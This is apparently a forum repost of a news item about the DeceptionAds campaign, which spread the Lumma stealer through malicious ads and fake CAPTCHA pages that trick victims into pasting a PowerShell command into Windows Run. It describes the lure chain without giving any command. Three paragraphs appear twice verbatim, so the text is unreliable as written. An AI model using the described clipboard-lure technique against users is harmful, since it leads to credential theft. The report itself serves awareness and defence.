Man
Professional
- Messages
- 3,222
- Reaction score
- 807
- Points
- 113
A large-scale campaign to distribute the Lumma stealer, allegedly carried out by cybercriminals from the Vane Viper group, has been discovered. Guardio Labs analysts managed to uncover it, and specified that the main method of infection was fake CAPTCHAs, which prompted potential victims to execute PowerShell commands.
The campaign itself was called DeceptionAds. The Monetag advertising network was chosen as the main environment for work, thanks to which hackers managed to display more than a million advertisements for 3,000 sites daily. Analysts note that DeceptionAds is an advanced version of ClickFix, which also tricks victims into executing malicious commands. The key difference is that Vane Viper managed to adapt a legitimate advertising network for distribution.
Users were lured in by pop-up banners promoting fake services related to pirated streaming platforms or software. After clicking on the ad, a check will be performed to see if the person has made it, after which the victim will be redirected to a page with a fake CAPTCHA. For disguise, the criminals use the BeMob service. Its traditional use is to track the effectiveness of advertising campaigns, but in this case it helps to evade detection.
The fake CAPTCHA page contains a JavaScript snippet that copies a short PowerShell command to the user's clipboard. The victim then receives instructions to execute the command via Windows Run. As a result, the Lumma stealer is downloaded to the user's device, ready to steal data from it. After this campaign was discovered, Monetag deleted 200 accounts of the cybercriminals. However, researchers noticed that since mid-December, they simply started using a different ad network.
The campaign itself was called DeceptionAds. The Monetag advertising network was chosen as the main environment for work, thanks to which hackers managed to display more than a million advertisements for 3,000 sites daily. Analysts note that DeceptionAds is an advanced version of ClickFix, which also tricks victims into executing malicious commands. The key difference is that Vane Viper managed to adapt a legitimate advertising network for distribution.
Users were lured in by pop-up banners promoting fake services related to pirated streaming platforms or software. After clicking on the ad, a check will be performed to see if the person has made it, after which the victim will be redirected to a page with a fake CAPTCHA. For disguise, the criminals use the BeMob service. Its traditional use is to track the effectiveness of advertising campaigns, but in this case it helps to evade detection.
The fake CAPTCHA page contains a JavaScript snippet that copies a short PowerShell command to the user's clipboard. The victim then receives instructions to execute the command via Windows Run. As a result, the Lumma stealer is downloaded to the user's device, ready to steal data from it. After this campaign was discovered, Monetag deleted 200 accounts of the cybercriminals. However, researchers noticed that since mid-December, they simply started using a different ad network.
